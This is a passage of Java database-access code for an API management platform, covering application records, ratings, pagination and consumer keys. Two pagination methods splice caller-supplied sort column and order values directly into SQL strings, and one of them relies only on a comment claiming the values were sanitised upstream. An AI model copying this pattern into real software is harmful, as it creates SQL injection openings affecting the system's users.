APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return avrRating; } /** * @param apiIdentifier API Identifier * @throws APIManagementException if failed to add Application */ public float getAverageRating(APIIdentifier apiIdentifier, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; float avrRating = 0; try { //Get API Id int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); return Float.NEGATIVE_INFINITY; } //This query to update the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_AVERAGE_RATING_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { avrRating = rs.getFloat("RATING"); } } catch (SQLException e) { handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } BigDecimal decimal = new BigDecimal(avrRating); return Float.parseFloat(decimal.setScale(1, BigDecimal.ROUND_UP).toString()); } /** * @param application Application * @param userId User Id * @throws APIManagementException if failed to add Application */ public int addApplication(Application application, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; conn.setAutoCommit(false); ResultSet rs = null; int applicationId = 0; try { int tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //This query to update the AM_APPLICATION table String sqlQuery = SQLConstants.APP_APPLICATION_SQL; // Adding data to the AM_APPLICATION table //ps = conn.prepareStatement(sqlQuery); ps = conn.prepareStatement(sqlQuery, new String[]{"APPLICATION_ID"}); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { ps = conn.prepareStatement(sqlQuery, new String[]{"application_id"}); } ps.setString(1, application.getName()); ps.setInt(2, subscriber.getId()); ps.setString(3, application.getTier()); ps.setString(4, application.getCallbackUrl()); ps.setString(5, application.getDescription()); if (APIConstants.DEFAULT_APPLICATION_NAME.equals(application.getName())) { ps.setString(6, APIConstants.ApplicationStatus.APPLICATION_APPROVED); } else { ps.setString(6, APIConstants.ApplicationStatus.APPLICATION_CREATED); } String groupId = application.getGroupId(); if (multiGroupAppSharingEnabled) { // setting an empty groupId since groupid's should be saved in groupId mapping table groupId = ""; } ps.setString(7, groupId); ps.setString(8, subscriber.getName()); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); ps.setTimestamp(9, timestamp); ps.setTimestamp(10, timestamp); ps.setString(11, UUID.randomUUID().toString()); ps.setString(12, String.valueOf(application.getTokenType())); ps.executeUpdate(); rs = ps.getGeneratedKeys(); while (rs.next()) { applicationId = Integer.parseInt(rs.getString(1)); } //Adding data to AM_APPLICATION_ATTRIBUTES table if( application.getApplicationAttributes() != null) { addApplicationAttributes(conn, application.getApplicationAttributes(), applicationId, tenantId); } } catch (SQLException e) { handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return applicationId; } public void updateApplication(Application application) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement preparedStatement = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to update the AM_APPLICATION table String sqlQuery = SQLConstants.UPDATE_APPLICATION_SQL; // Adding data to the AM_APPLICATION table ps = conn.prepareStatement(sqlQuery); ps.setString(1, application.getName()); ps.setString(2, application.getTier()); ps.setString(3, application.getCallbackUrl()); ps.setString(4, application.getDescription()); //TODO need to find the proper user who updates this application. ps.setString(5, null); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.setString(7, application.getTokenType()); ps.setInt(8, application.getId()); ps.executeUpdate(); if (multiGroupAppSharingEnabled) { Subscriber subscriber = application.getSubscriber(); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); updateGroupIDMappings(conn, application.getId(), application.getGroupId(), tenantDomain); } Subscriber subscriber = application.getSubscriber(); String domain = MultitenantUtils.getTenantDomain(subscriber.getName()); int tenantId = IdentityTenantUtil.getTenantId(domain); preparedStatement = conn.prepareStatement(SQLConstants.REMOVE_APPLICATION_ATTRIBUTES_SQL); preparedStatement.setInt(1,application.getId()); preparedStatement.execute(); if (log.isDebugEnabled()) { log.debug("Old attributes of application - " + application.getName() + " are removed"); } if (application.getApplicationAttributes() != null && !application.getApplicationAttributes().isEmpty()) { addApplicationAttributes(conn, application.getApplicationAttributes(), application.getId(), tenantId); } conn.commit(); updateOAuthConsumerApp(application.getName(), application.getCallbackUrl()); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } catch (IdentityOAuthAdminException e) { handleException("Failed to update OAuth Consumer Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); APIMgtDBUtil.closeAllConnections(preparedStatement,conn,null); } } /** * Update the status of the Application creation process * * @param applicationId * @param status * @throws APIManagementException */ public void updateApplicationStatus(int applicationId, String status) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String updateSqlQuery = SQLConstants.UPDATE_APPLICATION_STATUS_SQL; ps = conn.prepareStatement(updateSqlQuery); ps.setString(1, status); ps.setInt(2, applicationId); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * get the status of the Application creation process * * @param appName * @return * @throws APIManagementException */ public String getApplicationStatus(String appName, String userId) throws APIManagementException { int applicationId = getApplicationId(appName, userId); return getApplicationStatusById(applicationId); } /** * get the status of the Application creation process given the application Id * * @param applicationId Id of the Application * @return * @throws APIManagementException */ public String getApplicationStatusById(int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String status = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.GET_APPLICATION_STATUS_BY_ID_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); resultSet = ps.executeQuery(); while (resultSet.next()) { status = resultSet.getString("APPLICATION_STATUS"); } conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return status; } /** * Check whether given application name is available under current subscriber or group * * @param appName application name * @param username subscriber * @param groupId group of the subscriber * @return true if application is available for the subscriber * @throws APIManagementException if failed to get applications for given subscriber */ public boolean isApplicationExist(String appName, String username, String groupId) throws APIManagementException { if (username == null) { return false; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_PREFIX; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdCaseInsensitive = " AND (APP.GROUP_ID = ? " + "OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ) " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR (LOWER(SUB.USER_ID) = LOWER(?))" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInsensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; try { connection = APIMgtDBUtil.getConnection(); if (!StringUtils.isEmpty(groupId)) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupId.split(","); int noOfParams = grpIdArray.length; preparedStatement = fillQueryParams(connection, sqlQuery, grpIdArray, 2); preparedStatement.setString(1, appName); int paramIndex = noOfParams + 1; preparedStatement.setString(++paramIndex, tenantDomain); preparedStatement.setString(++paramIndex, subscriber.getName()); preparedStatement.setString(++paramIndex, tenantDomain + '/' + groupId); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithGroupId; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, groupId); preparedStatement.setString(3, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInsensitive; } else { sqlQuery += whereClause; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, subscriber.getName()); } resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { appId = resultSet.getInt("APPLICATION_ID"); } if (appId > 0) { return true; } } catch (SQLException e) { handleException("Error while getting the id of " + appName + " from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return false; } /** * Check whether the new user has an application * * @param appName application name * @param username subscriber * @return true if application is available for the subscriber * @throws APIManagementException if failed to get applications for given subscriber */ public boolean isApplicationOwnedBySubscriber(String appName, String username) throws APIManagementException { if (username == null) { return false; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_PREFIX; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInsensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; try { connection = APIMgtDBUtil.getConnection(); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInsensitive; } else { sqlQuery += whereClause; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, subscriber.getName()); resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { appId = resultSet.getInt("APPLICATION_ID"); } if (appId > 0) { return true; } } catch (SQLException e) { handleException("Error while getting the id of " + appName + " from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return false; } /** * @param username Subscriber * @return ApplicationId for given appname. * @throws APIManagementException if failed to get Applications for given subscriber. */ public int getApplicationId(String appName, String username) throws APIManagementException { if (username == null) { return 0; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, subscriber.getId()); prepStmt.setString(2, appName); rs = prepStmt.executeQuery(); while (rs.next()) { appId = rs.getInt("APPLICATION_ID"); } } catch (SQLException e) { handleException("Error when getting the application id from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appId; } /** * Find the name of the application by Id * * @param applicationId - applicatoin id * @return - application name * @throws APIManagementException */ public String getApplicationNameFromId(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String appName = null; String sqlQuery = SQLConstants.GET_APPLICATION_NAME_FROM_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); rs = prepStmt.executeQuery(); while (rs.next()) { appName = rs.getString("NAME"); } } catch (SQLException e) { handleException("Error when getting the application name for id " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appName; } public int getAllApplicationCount(Subscriber subscriber, String groupingId, String search) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String sqlQuery = null; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE_WITH_MULTIGROUPID; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE_WITH_MULTIGROUPID; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupingId.split(","); int noOfParams = grpIdArray.length; prepStmt = fillQueryParams(connection, sqlQuery, grpIdArray, 1); prepStmt.setString(++noOfParams, tenantDomain); prepStmt.setString(++noOfParams, subscriber.getName()); prepStmt.setString(++noOfParams, "%" + search + "%"); } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE_WITHGROUPID; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE_WITHGROUPID; } prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); prepStmt.setString(3, "%" + search + "%"); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE; } prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, subscriber.getName()); prepStmt.setString(2, "%" + search + "%"); } resultSet = prepStmt.executeQuery(); int applicationCount = 0; if (resultSet != null) { while (resultSet.next()) { applicationCount = resultSet.getInt("count"); } } if (applicationCount > 0) { return applicationCount; } } catch (SQLException e) { handleException("Failed to get applicaiton count : ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return 0; } /** * Returns all applications created by given user Id * * @param userId * @return * @throws APIManagementException */ public Application[] getApplicationsByOwner(String userId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String appName = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATIONS_BY_OWNER; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, userId); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("UUID")); application.setName(rs.getString("NAME")); application.setOwner(rs.getString("CREATED_BY")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(rs.getInt("APPLICATION_ID"))); } applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when getting the application name for id " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns all applications created by given user Id * * @param userName * @return * @throws APIManagementException */ public boolean updateApplicationOwner(String userName, Application application) throws APIManagementException { boolean isAppUpdated = false; Connection connection = null; PreparedStatement prepStmt = null; String appName = null; String sqlQuery = SQLConstants.UPDATE_APPLICATION_OWNER; try { Subscriber subscriber = getSubscriber(userName); if (subscriber != null) { int subscriberId = getSubscriber(userName).getId(); connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, userName); prepStmt.setInt(2, subscriberId); prepStmt.setString(3, application.getUUID()); prepStmt.executeUpdate(); isAppUpdated = true; } else { String errorMessage = "Error when retrieving subscriber details for user " + userName; handleException(errorMessage, new APIManagementException(errorMessage)); } } catch (SQLException e) { handleException("Error when updating application owner for user " + userName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } return isAppUpdated; } /** * #TODO later we might need to use only this method. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @param start The start index. * @param offset The offset. * @param search The search string. * @param sortOrder The sort order. * @param sortColumn The sort column. * @return Application[] The array of applications. * @throws APIManagementException */ public Application[] getApplicationsWithPagination(Subscriber subscriber, String groupingId, int start, int offset, String search, String sortColumn, String sortOrder) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = null; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE_WITH_MULTIGROUPID"); } else { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE_WITH_MULTIGROUPID"); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE_WITHGROUPID"); } else { sqlQuery = SQLConstantManagerFactory. getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE_WITHGROUPID"); } } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_PREFIX_CASESENSITVE"); } else { sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_PREFIX_NONE_CASESENSITVE"); } } try { connection = APIMgtDBUtil.getConnection(); // sortColumn, sortOrder variable values has sanitized in jaggery level (applications-list.jag)for security. sqlQuery = sqlQuery.replace("$1", sortColumn); sqlQuery = sqlQuery.replace("$2", sortOrder); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupingId.split(","); int noOfParams = grpIdArray.length; prepStmt = fillQueryParams(connection, sqlQuery, grpIdArray, 1); prepStmt.setString(++noOfParams, tenantDomain); prepStmt.setString(++noOfParams, subscriber.getName()); prepStmt.setString(++noOfParams, tenantDomain + '/' + groupingId); prepStmt.setString(++noOfParams, "%" + search + "%"); prepStmt.setInt(++noOfParams, start); prepStmt.setInt(++noOfParams, offset); } else { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); prepStmt.setString(3, "%" + search + "%"); prepStmt.setInt(4, start); prepStmt.setInt(5, offset); } } else { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, subscriber.getName()); prepStmt.setString(2, "%" + search + "%"); prepStmt.setInt(3, start); prepStmt.setInt(4, offset); } rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("NAME"), subscriber); application.setId(rs.getInt("APPLICATION_ID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setIsBlackListed(rs.getBoolean("ENABLED")); application.setOwner(rs.getString("CREATED_BY")); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns all the applications associated with given subscriber and group id. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @return Application[] Array of applications. * @throws APIManagementException */ public Application[] getApplications(Subscriber subscriber, String groupingId) throws APIManagementException { Application[] applications = getLightWeightApplications(subscriber, groupingId); for (Application application : applications) { Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } } return applications; } /** * Returns all the applications associated with given subscriber and group id, without their keys. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @return Application[] Array of applications. * @throws APIManagementException */ public Application[] getLightWeightApplications(Subscriber subscriber, String groupingId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATIONS_PREFIX; String whereClauseWithGroupId; String whereClauseWithMultiGroupId; if (forceCaseInsensitiveComparisons) { if (multiGroupAppSharingEnabled) { whereClauseWithGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR (LOWER(SUB.USER_ID) = LOWER(?))" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; } else { whereClauseWithGroupId = " AND " + " (GROUP_ID= ? " + " OR " + " ((GROUP_ID='' OR GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?))) "; } } else { if (multiGroupAppSharingEnabled) { whereClauseWithGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR ( SUB.USER_ID = ? )" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) "; } else { whereClauseWithGroupId = " AND " + " (GROUP_ID= ? " + " OR " + " ((GROUP_ID='' OR GROUP_ID IS NULL) AND SUB.USER_ID=?))"; } } String whereClause; if (forceCaseInsensitiveComparisons) { whereClause = " AND " + " LOWER(SUB.USER_ID) = LOWER(?)"; } else { whereClause = " AND " + " SUB.USER_ID = ?"; } if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { sqlQuery += whereClauseWithGroupId; } else { sqlQuery += whereClause; } try { connection = APIMgtDBUtil.getConnection(); String blockingFilerSql = null; if (connection.getMetaData().getDriverName().contains("MS SQL") || connection.getMetaData().getDriverName().contains("Microsoft")) { sqlQuery = sqlQuery.replaceAll("NAME", "cast(NAME as varchar(100)) collate " + "SQL_Latin1_General_CP1_CI_AS as NAME"); blockingFilerSql = " select distinct x.*,bl.ENABLED from ( " + sqlQuery + " )x left join " + "AM_BLOCK_CONDITIONS bl on ( bl.TYPE = 'APPLICATION' AND bl.VALUE = (x.USER_ID + ':') + x" + ".name)"; } else { blockingFilerSql = " select distinct x.*,bl.ENABLED from ( " + sqlQuery + " )x left join AM_BLOCK_CONDITIONS bl on ( bl.TYPE = 'APPLICATION' AND bl.VALUE = " + "concat(concat(x.USER_ID,':'),x.name))"; } if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIDArray[] = groupingId.split(","); int paramIndex = groupIDArray.length; prepStmt = fillQueryParams(connection, blockingFilerSql, groupIDArray, 1); prepStmt.setString(++paramIndex, tenantDomain); prepStmt.setString(++paramIndex, subscriber.getName()); prepStmt.setString(++paramIndex, tenantDomain + '/' + groupingId); } else { prepStmt = connection.prepareStatement(blockingFilerSql); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); } } else { prepStmt = connection.prepareStatement(blockingFilerSql); prepStmt.setString(1, subscriber.getName()); } rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; Map<String,String> applicationAttributes; int applicationId = 0; while (rs.next()) { applicationId = rs.getInt("APPLICATION_ID"); application = new Application(rs.getString("NAME"), subscriber); application.setId(applicationId); application.setTier(rs.getString("APPLICATION_TIER")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setIsBlackListed(rs.getBoolean("ENABLED")); application.setOwner(rs.getString("CREATED_BY")); application.setTokenType(rs.getString("TOKEN_TYPE")); applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); if (multiGroupAppSharingEnabled) { setGroupIdInApplication(application); } applicationsList.add(application); } Collections.sort(applicationsList, new Comparator<Application>() { public int compare(Application o1, Application o2) { return o1.getName().compareToIgnoreCase(o2.getName()); } }); applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns applications within a tenant domain with pagination * @param tenantId The tenantId. * @param start The start index. * @param offset The offset. * @param searchOwner The search string. * @param searchApplication The search string. * @param sortOrder The sort order. * @param sortColumn The sort column. * @return Application[] The array of applications. * @throws APIManagementException */ public List<Application> getApplicationsByTenantIdWithPagination(int tenantId, int start, int offset, String searchOwner, String searchApplication, String sortColumn, String sortOrder) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; Application applications = null; String sqlQuery = null; List<Application> applicationList = new ArrayList<>(); sqlQuery = SQLConstantManagerFactory.getSQlString("GET_APPLICATIONS_BY_TENANT_ID"); try { connection = APIMgtDBUtil.getConnection(); sqlQuery = sqlQuery.replace("$1", sortColumn); sqlQuery = sqlQuery.replace("$2", sortOrder); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, tenantId); prepStmt.setString(2, "%" + searchOwner + "%"); prepStmt.setString(3, "%" + searchApplication + "%"); prepStmt.setInt(4, start); prepStmt.setInt(5, offset); rs = prepStmt.executeQuery(); Application application; while (rs.next()) { String applicationName = rs.getString("NAME"); String subscriberName = rs.getString("CREATED_BY"); Subscriber subscriber = new Subscriber(subscriberName); application = new Application(applicationName, subscriber); application.setName(applicationName); application.setId(rs.getInt("APPLICATION_ID")); application.setUUID(rs.getString("UUID")); application.setGroupId(rs.getString("GROUP_ID")); subscriber.setTenantId(rs.getInt("TENANT_ID")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); application.setOwner(subscriberName); applicationList.add(application); } } catch (SQLException e) { handleException("Error while obtaining details of the Application for tenant id : " + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applicationList; } public int getApplicationsCount(int tenantId, String searchOwner, String searchApplication) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String sqlQuery = null; try { connection = APIMgtDBUtil.getConnection(); sqlQuery = SQLConstants.GET_APPLICATIONS_COUNT; prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, tenantId); prepStmt.setString(2, "%" + searchOwner + "%"); prepStmt.setString(3, "%" + searchApplication + "%"); resultSet = prepStmt.executeQuery(); int applicationCount = 0; if (resultSet != null) { while (resultSet.next()) { applicationCount = resultSet.getInt("count"); } } if (applicationCount > 0) { return applicationCount; } } catch (SQLException e) { handleException("Failed to get application count of tenant id : " + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return 0; } public Application[] getAllApplicationsOfTenantForMigration(String appTenantDomain) throws APIManagementException { Connection connection; PreparedStatement prepStmt = null; ResultSet rs; Application[] applications = null; String sqlQuery = SQLConstants.GET_SIMPLE_APPLICATIONS; String tenantFilter = "AND SUB.TENANT_ID=?"; sqlQuery += tenantFilter ; try { connection = APIMgtDBUtil.getConnection(); int appTenantId = APIUtil.getTenantIdFromTenantDomain(appTenantDomain); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, appTenantId); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(Integer.parseInt(rs.getString("APPLICATION_ID"))); application.setName(rs.getString("NAME")); application.setOwner(rs.getString("CREATED_BY")); applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when reading the application information from the persistence store.", e); } finally { if (prepStmt != null) { try { prepStmt.close(); } catch (SQLException e) { log.warn("Database error. Could not close Statement. Continuing with others." + e.getMessage(), e); } } } return applications; } /** * Returns all the consumerkeys of application which are subscribed for the given api * * @param identifier APIIdentifier * @return Consumerkeys * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get Applications for given subscriber. */ public String[] getConsumerKeys(APIIdentifier identifier) throws APIManagementException { Set<String> consumerKeys = new HashSet<String>(); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int apiId; String sqlQuery = SQLConstants.GET_CONSUMER_KEYS_SQL; try { connection = APIMgtDBUtil.getConnection(); apiId = getAPIID(identifier, connection); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, apiId); rs = prepStmt.executeQuery(); while (rs.next()) { consumerKeys.add(rs.getString("CONSUMER_KEY")); } } catch (SQLException e) { handleException("Error when reading application subscription information", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return consumerKeys.toArray(new String[consumerKeys.size()]); } /** * Deletes an Application along with subscriptions, keys and registration data * * @param application Application object to be deleted from the database which has the application Id * @throws APIManagementException */ public void deleteApplication(Application application) throws APIManagementException { Connection connection = null; PreparedStatement deleteMappingQuery = null; PreparedStatement prepStmt = null; PreparedStatement prepStmtGetConsumerKey = null; 